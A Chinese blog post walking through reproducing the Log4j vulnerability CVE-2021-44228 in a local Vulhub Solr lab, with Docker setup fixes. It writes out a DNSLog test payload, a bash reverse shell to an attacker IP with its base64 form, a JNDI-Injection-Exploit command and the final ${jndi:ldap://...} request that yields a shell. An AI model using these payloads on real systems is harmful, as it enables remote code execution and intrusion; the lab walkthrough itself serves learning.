【vluhub】log4j注入漏洞 CVE-2021-44228

LOG4介绍

是一个用Java编写的可靠,快速和灵活的日志框架(API),它在Apache软件许可下发布

log4j存在远程代码执行漏洞、受影响版本2.x

部署环境

攻击机环境:192.168.3.180

kail环境:192.168.203.12【NAT转换的】

部署vluhub

具体流程参考其他博主,本文主要讲解在部署vluhub过程中存在的几个问题,作为记录

问题一、apt-get install docker docker-compose,执行失败,下载失败,修改外网下载也失败

获取离线安装包

直通车

Releases · docker/compose · GitHub

具体版本

下载后存储至

赋予执行权限

sudo chmod +x /usr/local/bin/docker-compose

查看版本docker-compose -v

问题二、

wget https://github.com/vulhub/vulhub/archive/master.zip下载失败

手动下载https://github.com/vulhub/vulhub/archive/master.zip

上传解压

unzip vulhub-master.zip

cd vulhub-master

问题三、docker compose up -d执行失败

由于修改vluhub外网导致,需要切换成国内网络

修改内容如下

重启服务

再次执行 docker compose up -d

端口8983搭建成功

地址访问

复制代码
http://192.168.203.12:8983/solr/admin/cores?action=1

验证是否存在漏洞

DNSLog Platform

替换发送请求

[http://192.168.203.12:8983/solr/admin/cores?action=${jndi:ldap://8dyb3y.dnslog.cn}](http://192.168.203.12:8983/solr/admin/cores?action=${jndi:ldap://8dyb3y.dnslog.cn} "http://192.168.203.12:8983/solr/admin/cores?action=${jndi:ldap://8dyb3y.dnslog.cn}")

刷新dns右边这个按钮 出现下方内容则存在

bash -i >& /dev/tcp/192.168.3.180/6666 0>&1

反向getshell base64编码

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMuMTgwLzY2NjYgMD4mMQ==

获取JNDI包

https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

执行

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMuMTgwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 192.168.3.180

生成获取ldap内容 有用

创建监听nc-lvvp 6666异常由于windwos 没有安装nc需要安装

直通车

netcat 1.11 for Win32/Win64

安装后火绒会报毒,运行

然后在该路径下执行 nc-lvvp 6666

将生成ldap内容复制替换,重新刷新一下接口

[http://192.168.203.12:8983/solr/admin/cores?action=${jndi:ldap://192.168.3.180:1389/mjv27z}](http://192.168.203.12:8983/solr/admin/cores?action=${jndi:ldap://192.168.3.180:1389/mjv27z} "http://192.168.203.12:8983/solr/admin/cores?action=${jndi:ldap://192.168.3.180:1389/mjv27z}")

getshell了

大概就是这么个流程!

哦 最后一步移除环境

docker-compose down

参考:

centos离线安装docker,docker-compose_centos离线安装docker-compose-CSDN博客

Log4j漏洞环境搭建以及复现拿getshell_dockerlog4j环境搭建-CSDN博客

相关推荐
马哥python说17 分钟前
【效率软件】抖音转换工具:主页链接和抖音号一键批量互转
爬虫·python
江山如画,佳人北望23 分钟前
pytorch常用函数
人工智能·pytorch·python
这里有鱼汤37 分钟前
首个开源金融平台,一站式数据终端 + AI 代理,量化研究者的利器,速来白嫖
后端·python
这里有鱼汤39 分钟前
Python量化实战:如何用Python实现查找相似K线,附源码,建议收藏
后端·python
1candobetter42 分钟前
JAVA后端开发——用 Spring Boot 实现定时任务
java·开发语言·spring boot
小阿鑫42 分钟前
使用 Kiro AI IDE 3小时实现全栈应用Admin系统
前端·后端·python·admin·kiro·next admin·fastapi admin
Blossom.1181 小时前
基于深度学习的医学图像分析:使用YOLOv5实现细胞检测
人工智能·python·深度学习·yolo·机器学习·分类·迁移学习
啊阿狸不会拉杆1 小时前
《Java 程序设计》第 8 章 - Java 常用核心类详解
java·开发语言·python·算法·intellij-idea
小白学大数据2 小时前
Python + Requests库爬取动态Ajax分页数据
开发语言·python·ajax·okhttp
2501_920047032 小时前
python-内存管理
开发语言·jvm·python